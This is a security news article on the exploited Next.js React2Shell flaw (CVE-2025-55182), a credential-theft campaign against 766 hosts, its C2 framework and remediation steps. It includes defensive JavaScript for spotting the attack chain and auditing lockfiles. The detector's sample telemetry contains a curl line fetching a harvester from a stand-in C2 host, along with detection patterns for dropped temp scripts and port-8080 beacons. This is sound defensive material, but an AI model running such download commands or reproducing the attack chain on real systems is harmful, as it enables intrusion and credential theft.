Hackers News
Threats

Critical Next.js React2Shell flaw exploited to steal credentials from 766 hosts

Jennifer Sherman
April 7, 2026

Key Takeaways

  • A critical vulnerability, CVE-2025-55182 (React2Shell), in Next.js React Server Components is being actively exploited.
  • Attackers leveraged this flaw to compromise 766 servers in 24 hours, stealing credentials and sensitive data across major cloud providers.
  • The threat actor, UAT-10608, uses an automated attack chain and a custom C2 framework called NEXUS Listener.
  • The vulnerability has a CVSS score of 10.0, allowing unauthenticated remote code execution.
  • Immediate patching and credential rotation are crucial for affected Next.js applications.

A severe vulnerability, dubbed React2Shell and tracked as CVE-2025-55182, is under active exploitation against web applications built on the popular Next.js framework. The campaign has compromised internet-facing systems at scale in a matter of hours.

Within a mere 24-hour period, threat actors successfully breached 766 servers, exfiltrating a substantial volume of sensitive information, including passwords, cloud keys, and database credentials.

The React2Shell Vulnerability

The core of this attack is CVE-2025-55182, also known as React2Shell, which carries the maximum CVSS score of 10.0. The flaw sits in the React Server Components (RSC) Flight protocol, specifically in how a React server processes and deserializes the payload of HTTP requests sent to Server Function endpoints. A single specially crafted HTTP request is enough to execute arbitrary code on the server, and no authentication is required. Because Next.js ships this RSC code path to a very large install base, its exposure is tracked under a separate identifier, CVE-2025-66478.

Researchers at Cisco Talos identified this highly automated operation, attributing it to a threat cluster they are now tracking as UAT-10608.

Automated and Indiscriminate Attacks

The campaign exhibits a systematic and indiscriminate approach. Attackers utilize scanning services such as Shodan and Censys to sweep the internet for publicly accessible Next.js deployments running vulnerable versions of React Server Components. Once a target is identified, the entire exploitation and data exfiltration process proceeds autonomously, requiring no further manual intervention after the initial exploit is triggered.

The extent of the damage is considerable. Across diverse geographical regions and major cloud providers, including AWS, Google Cloud, and Microsoft Azure, at least 766 hosts were confirmed compromised within a single day. The stolen data encompasses a wide array of critical assets, such as database connection strings, SSH private keys, cloud access tokens, GitHub tokens, Stripe live secret keys, Kubernetes service account credentials, environment variables, and shell command histories. More than 10,120 files were collectively harvested from the affected systems.

The ramifications of this campaign extend beyond immediate account takeover. Several breached hosts exposed package registry authentication files, including npm and pip configuration files containing registry credentials. Should attackers leverage these tokens to inject malicious versions of trusted software packages, the potential harm could propagate to any organization that installs those packages, thereby posing a significant supply chain threat.

The NEXUS Listener: Orchestrating Data Exfiltration

To manage the torrent of stolen information from hundreds of compromised servers, UAT-10608 has deployed a bespoke command-and-control (C2) framework named NEXUS Listener. This web-based platform, currently in its third version, furnishes operators with a graphical dashboard. From this interface, they can browse compromised hosts, categorize stolen credentials, review harvesting statistics, and ascertain the number of credentials successfully extracted during each phase of an attack.

The attack sequence begins with the identification of a vulnerable endpoint, followed by the transmission of a single malicious HTTP request to the RSC Server Function endpoint. The server then deserializes the crafted payload, executing arbitrary code. This action drops a lightweight shell script into a temporary directory under a randomized filename, aiming to evade detection. This initial dropper subsequently retrieves a multi-phase credential harvesting script from the attacker’s infrastructure.

Each subsequent phase is dedicated to collecting a different category of data, ranging from SSH keys and cloud tokens to database passwords. This harvested information is then reported back to the NEXUS Listener C2 server on port 8080, along with the victim’s hostname and a phase identifier. The highly automated nature of this process explains how UAT-10608 managed to compromise hundreds of systems with such speed.
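The chain just described (the web server process spawning a shell on a randomly named script in a temp directory, then that process tree calling out to a host on port 8080) is exactly what container or endpoint telemetry can catch. The following is an added example, not code from the article or from Cisco Talos: it correlates two constructed event streams (process executions and outbound TCP connections, shaped like what a container runtime or EDR sensor emits) and flags that sequence. The `node` parent process, the allowlisted in-cluster service on 10.0.0.25:8080, the download of the harvester over port 8080, and all sample events are assumptions built for the example; the filename heuristic is mine, not an indicator published for this campaign.

```javascript
// Added detection example (not the article's or Cisco Talos's code).
// Correlates two constructed telemetry streams:
//   PROCESS_EVENTS    - process executions (pid, ppid, comm, argv)
//   CONNECTION_EVENTS - outbound TCP connections (pid, "ip:port")
// and flags the chain the article describes: the web server's node process
// spawning a shell on a randomly named script in a temp directory, followed by
// connections from that process tree to a non-allowlisted host on port 8080.

const WEB_SERVER_COMM = 'node';                     // assumption: the app runs as a plain node process
const SHELLS = new Set(['sh', 'bash', 'dash', 'ash']);
const TEMP_DIRS = ['/tmp/', '/var/tmp/', '/dev/shm/'];
const C2_PORT = 8080;
const ALLOWED_EGRESS = new Set(['10.0.0.25:8080']); // hypothetical legitimate in-cluster service on 8080

// Constructed sample telemetry (not real data).
const PROCESS_EVENTS = [
  { ts: '2026-04-05T09:12:01Z', pid: 4100, ppid: 1,    comm: 'node', argv: ['node', 'server.js'] },
  { ts: '2026-04-05T09:12:44Z', pid: 4188, ppid: 4100, comm: 'sh',   argv: ['sh', '/tmp/.x9f2kq1'] },
  { ts: '2026-04-05T09:12:45Z', pid: 4190, ppid: 4188, comm: 'curl', argv: ['curl', '-s', 'http://203.0.113.7:8080/s2'] },
  { ts: '2026-04-05T09:13:10Z', pid: 4210, ppid: 4100, comm: 'sh',   argv: ['sh', '-c', 'npm run build'] },
];
const CONNECTION_EVENTS = [
  { ts: '2026-04-05T09:12:02Z', pid: 4100, dst: '10.0.0.25:8080' },   // allowlisted: benign
  { ts: '2026-04-05T09:12:45Z', pid: 4190, dst: '203.0.113.7:8080' }, // hypothetical harvester download
  { ts: '2026-04-05T09:12:58Z', pid: 4188, dst: '203.0.113.7:8080' }, // phase report to C2
  { ts: '2026-04-05T09:13:12Z', pid: 4210, dst: '104.16.0.1:443' },   // registry traffic: benign
];

function indexByPid(events) {
  const map = new Map();
  for (const e of events) map.set(e.pid, e);
  return map;
}

// True if `pid` or any ancestor (following ppid links) has the given comm.
function inProcessTreeOf(pidMap, pid, comm) {
  const seen = new Set();
  let cur = pidMap.get(pid);
  while (cur && !seen.has(cur.pid)) {
    seen.add(cur.pid);
    if (cur.comm === comm) return true;
    cur = pidMap.get(cur.ppid);
  }
  return false;
}

// Heuristic (mine, not a published IOC): a script in a temp directory whose
// basename is a short alphanumeric token with no extension, optionally hidden.
function looksLikeDroppedScript(arg) {
  if (!TEMP_DIRS.some((d) => arg.startsWith(d))) return false;
  const base = arg.slice(arg.lastIndexOf('/') + 1);
  return /^\.?[A-Za-z0-9_-]{5,}$/.test(base);
}

// Shell launched on a temp-dir script from underneath the web server process.
function findTempScriptSpawns(procEvents) {
  const pidMap = indexByPid(procEvents);
  return procEvents.filter(
    (e) => SHELLS.has(e.comm)
      && e.argv.slice(1).some(looksLikeDroppedScript)
      && inProcessTreeOf(pidMap, e.ppid, WEB_SERVER_COMM),
  );
}

function destinationPort(dst) {
  return Number(dst.slice(dst.lastIndexOf(':') + 1)); // IPv4 "ip:port" only, as in the sample data
}

// Port-8080 connections to non-allowlisted hosts from the web server's process tree.
function findSuspiciousBeacons(connEvents, procEvents) {
  const pidMap = indexByPid(procEvents);
  return connEvents.filter(
    (c) => destinationPort(c.dst) === C2_PORT
      && !ALLOWED_EGRESS.has(c.dst)
      && inProcessTreeOf(pidMap, c.pid, WEB_SERVER_COMM),
  );
}

function detect(procEvents = PROCESS_EVENTS, connEvents = CONNECTION_EVENTS) {
  const droppers = findTempScriptSpawns(procEvents);
  const beacons = findSuspiciousBeacons(connEvents, procEvents);
  const c2Hosts = [...new Set(beacons.map((b) => b.dst.slice(0, b.dst.lastIndexOf(':'))))];
  return { droppers, beacons, c2Hosts };
}

console.log(JSON.stringify(detect(), null, 2));
```

Either signal alone is noisy (build tooling runs shells, and plenty of legitimate services listen on 8080); the value is in requiring both to descend from the web server process. On the sample data the `npm run build` shell and the allowlisted 8080 connection are left alone, while the hidden `/tmp` script and both connections to 203.0.113.7 are flagged.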

What You Should Do

  • Upgrade every application that uses the App Router or any other React Server Components setup to a patched Next.js release (and the patched React Server Components packages it depends on) without delay.
  • Rotate all secrets in potentially affected environments, including AWS keys, database passwords, SSH keys, API tokens, and GitHub tokens; assume anything readable from the application process (environment variables, dotfiles, config files) has been taken.
  • Audit the IAM roles and service accounts attached to application containers for excess permissions, and require IMDSv2 on cloud instances so that a compromised process cannot pull instance credentials with a plain unauthenticated GET to the metadata service.
  • Stop reusing SSH key pairs across systems, so that one harvested private key does not open lateral movement to every host it was copied to.
  • Monitor outbound traffic from application containers and alert on connections to unknown IP addresses on port 8080, which in this campaign is the C2 reporting channel, as well as on the web server process spawning a shell on a script in a temporary directory.

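The first item is a version problem, and lockfiles make it auditable. Below is an added example, not code from the article or from the React or Next.js projects: it walks a package-lock.json (constructed inline) and reports every copy of `next` and of the `react-server-dom-*` packages, including nested copies under another package's node_modules, against a patched floor kept per MAJOR.MINOR release line. The floor is per line because the fix was backported to each supported line, so a single "minimum version" would classify a later line's unpatched release as safe. The floor values are the ones I understand the React and Next.js advisories give; they are not taken from this article, so verify them against the advisories before acting on the output. Next.js bundles its own copy of the RSC runtime, so the `next` version must be checked even when no react-server-dom-* entry appears.

```javascript
// Added example (not the article's or the React/Next.js projects' code):
// audit a package-lock.json (v2/v3 "packages" map) for copies of the
// React Server Components runtime and of Next.js below a patched floor.

// Assumed patched floors per MAJOR.MINOR release line. These are the values I
// understand the React and Next.js advisories give; verify against the
// advisories before relying on them. Lines with no floor are reported, not assumed safe.
const RSC_FLOORS = { '19.0': '19.0.1', '19.1': '19.1.2', '19.2': '19.2.1' };
const PATCH_FLOORS = {
  'react-server-dom-webpack': RSC_FLOORS,
  'react-server-dom-parcel': RSC_FLOORS,
  'react-server-dom-turbopack': RSC_FLOORS,
  next: {
    '15.0': '15.0.5', '15.1': '15.1.9', '15.2': '15.2.6', '15.3': '15.3.6',
    '15.4': '15.4.8', '15.5': '15.5.7', '16.0': '16.0.7',
  },
};

// Constructed lockfile excerpt (not from a real project).
const SAMPLE_LOCK = {
  name: 'example-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'example-app', dependencies: { next: '15.1.8', react: '19.1.0' } },
    'node_modules/next': { version: '15.1.8' },
    'node_modules/react': { version: '19.1.0' },
    'node_modules/react-server-dom-webpack': { version: '19.1.0' },
    'node_modules/some-tool/node_modules/react-server-dom-webpack': { version: '19.2.1' },
  },
};

function parseSemver(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(v);
  return m ? { major: +m[1], minor: +m[2], patch: +m[3], pre: m[4] || null } : null;
}

// Returns -1, 0 or 1. A prerelease (e.g. 19.1.2-canary.3) sorts below its
// release; two prereleases of the same triple are treated as equal here.
function compareSemver(a, b) {
  for (const k of ['major', 'minor', 'patch']) {
    if (a[k] !== b[k]) return a[k] < b[k] ? -1 : 1;
  }
  if (a.pre && !b.pre) return -1;
  if (!a.pre && b.pre) return 1;
  return 0;
}

// "node_modules/a/node_modules/@scope/b" -> "@scope/b". The nested copy matters
// as much as the top-level one, because it is the one `a` actually loads.
function packageName(lockKey) {
  const marker = 'node_modules/';
  const idx = lockKey.lastIndexOf(marker);
  return idx === -1 ? null : lockKey.slice(idx + marker.length);
}

function auditLockfile(lock, floors = PATCH_FLOORS) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    const name = packageName(key);
    if (!name || !Object.prototype.hasOwnProperty.call(floors, name) || !meta.version) continue;
    const v = parseSemver(meta.version);
    if (!v) {
      findings.push({ path: key, name, version: meta.version, status: 'unparseable' });
      continue;
    }
    const floor = floors[name][`${v.major}.${v.minor}`];
    if (!floor) {
      findings.push({ path: key, name, version: meta.version, status: 'no-floor-for-line' });
      continue;
    }
    const status = compareSemver(v, parseSemver(floor)) < 0 ? 'vulnerable' : 'patched';
    findings.push({ path: key, name, version: meta.version, floor, status });
  }
  return findings;
}

const results = auditLockfile(SAMPLE_LOCK);
for (const f of results) {
  console.log(`${f.status.padEnd(17)} ${f.name}@${f.version}  (${f.path})`);
}
```

Against the sample lockfile this reports `next@15.1.8` and the top-level `react-server-dom-webpack@19.1.0` as vulnerable and the nested 19.2.1 copy as patched; `react` itself is not in the watch list and is skipped. A `no-floor-for-line` result means the release line is not in your table, which is a prompt to look it up, not a pass.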
All Rights Reserved by HackersRadar ©2026